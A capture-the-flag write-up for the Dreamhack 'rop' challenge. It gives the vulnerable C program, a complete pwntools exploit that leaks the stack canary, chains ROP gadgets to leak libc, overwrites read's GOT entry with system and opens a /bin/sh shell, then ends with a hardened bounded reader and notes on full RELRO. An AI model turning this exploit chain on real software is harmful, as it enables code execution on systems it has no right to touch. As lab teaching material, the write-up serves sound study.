
[Wargame] rop

This challenge is based on the lecture material; see the post linked below for the detailed walkthrough.

2022.07.02 - [Dreamhack/Lecture & Practice] - [Practice] ROP - GOT Overwrite


1. Practice code

// Name: rop.c
// Compile: gcc -o rop rop.c -fno-PIE -no-pie

#include <stdio.h>
#include <unistd.h>

int main() {
  char buf[0x30];

  setvbuf(stdin, 0, _IONBF, 0);
  setvbuf(stdout, 0, _IONBF, 0);

  // Leak canary
  puts("[1] Leak Canary");
  printf("Buf: ");
  read(0, buf, 0x100);
  printf("Buf: %s\n", buf);

  // Do ROP
  puts("[2] Input ROP payload");
  printf("Buf: ");
  read(0, buf, 0x100);

  return 0;
}

2. Exploit

  • Writing the exploit with pwntools gives the following.

from pwn import *

def print_v(name, value):
    return success(":".join([name, hex(value)]))

p = remote("host3.dreamhack.games", 13192)
#p = process("./rop")
e = ELF("./rop")
libc = ELF("libc-2.27.so")


# Leak Canary
# 0x39 bytes overwrite the canary's null low byte, so "%s" prints its remaining 7 bytes
input1 = b"A" * 0x39
p.sendafter(b"Buf: ", input1)
p.recvuntil(input1)
canary = u64(b'\x00' + p.recvn(7))
print_v("Canary", canary)

# Do ROP
pop_rdi = 0x4007f3   # pop rdi; ret
rsi_r15 = 0x4007f1   # pop rsi; pop r15; ret
read_got = e.got['read']
read_plt = e.plt['read']
puts_plt = e.plt['puts']
read_lib = libc.symbols['read']
sys_lib = libc.symbols['system']

input2 = b"A" * 0x38
input2 += p64(canary)
input2 += b"B" * 0x8          # saved rbp
# puts(read_got): leak the libc address of read
input2 += p64(pop_rdi)
input2 += p64(read_got)
input2 += p64(puts_plt)
# read(0, read_got, ...): overwrite read's GOT entry, with "/bin/sh" stored right after it
input2 += p64(pop_rdi) + p64(0)
input2 += p64(rsi_r15)
input2 += p64(read_got) + p64(0)
input2 += p64(read_plt)
# read@plt now resolves to system; rdi points at "/bin/sh" at read_got+8
input2 += p64(pop_rdi)
input2 += p64(read_got + 8)
input2 += p64(read_plt)

p.sendafter(b"Buf: ", input2)
read_addr = u64(p.recvn(6) + b'\x00' * 2)
print_v("Read Addr", read_addr)
base_lib = read_addr - read_lib
system = base_lib + sys_lib

print_v("Base Libc", base_lib)
print_v("System Addr", system)
p.send(p64(system) + b"/bin/sh\x00")

p.interactive()

  • Through the resulting shell, the flag can be read.
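Both steps of the exploit rest on the same input-handling defect in rop.c: read(0, buf, 0x100) into a 0x30-byte buffer, with no null terminator before printf("%s"), which leaks the canary first and then reaches the return address. The bounded reader below is an added example, not the challenge's code; read_line_bounded, bounded_read_keeps_sentinel and the sentinel value are names and values chosen for this illustration. It shows the hardened form and checks it against the same oversized input.

```c
#include <stdio.h>
#include <string.h>
#include <unistd.h>

/* rop.c reads 0x100 bytes into a 0x30-byte buffer and never null-terminates
 * it, so printf("%s") walks past buf into the stack canary (step [1]) and the
 * second read() reaches the saved return address (step [2]). This bounded
 * reader is an added example, not the challenge's code: it never stores more
 * than cap-1 bytes, stops at the newline and always leaves a terminator. */
ssize_t read_line_bounded(int fd, char *buf, size_t cap) {
    if (cap == 0) return -1;
    size_t n = 0;
    while (n < cap - 1) {
        char c;
        ssize_t r = read(fd, &c, 1);
        if (r <= 0) break;      /* EOF or error: stop but still terminate */
        if (c == '\n') break;   /* drop the newline */
        buf[n++] = c;
    }
    buf[n] = '\0';              /* "%s" can never run past the buffer */
    return (ssize_t)n;
}

/* Self-check: push 0x100 bytes of 'A' (the length rop.c accepts) through a
 * pipe into a 0x30-byte buffer followed by a sentinel that stands in for the
 * canary. Returns 1 when only 0x2f bytes land in buf, buf is terminated and
 * the sentinel is untouched. */
int bounded_read_keeps_sentinel(void) {
    struct { char buf[0x30]; unsigned long long sentinel; } frame;
    const unsigned long long guard = 0x4142434445464748ULL; /* constructed */
    char junk[0x100];
    int fds[2];
    ssize_t n;
    memset(junk, 'A', sizeof junk);
    frame.sentinel = guard;
    if (pipe(fds) != 0) return 0;
    if (write(fds[1], junk, sizeof junk) != (ssize_t)sizeof junk) return 0;
    close(fds[1]);
    n = read_line_bounded(fds[0], frame.buf, sizeof frame.buf);
    close(fds[0]);
    return n == 0x2f && strlen(frame.buf) == 0x2f && frame.sentinel == guard;
}

int main(void) {
    printf("sentinel intact after oversized input: %d\n",
           bounded_read_keeps_sentinel());
    return 0;
}
```

Linking with -Wl,-z,relro,-z,now (full RELRO) would additionally make the GOT read-only after loading, so the GOT-overwrite step has nothing writable to target; the stack canary alone did not help here because it was leaked before the overflow was used.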
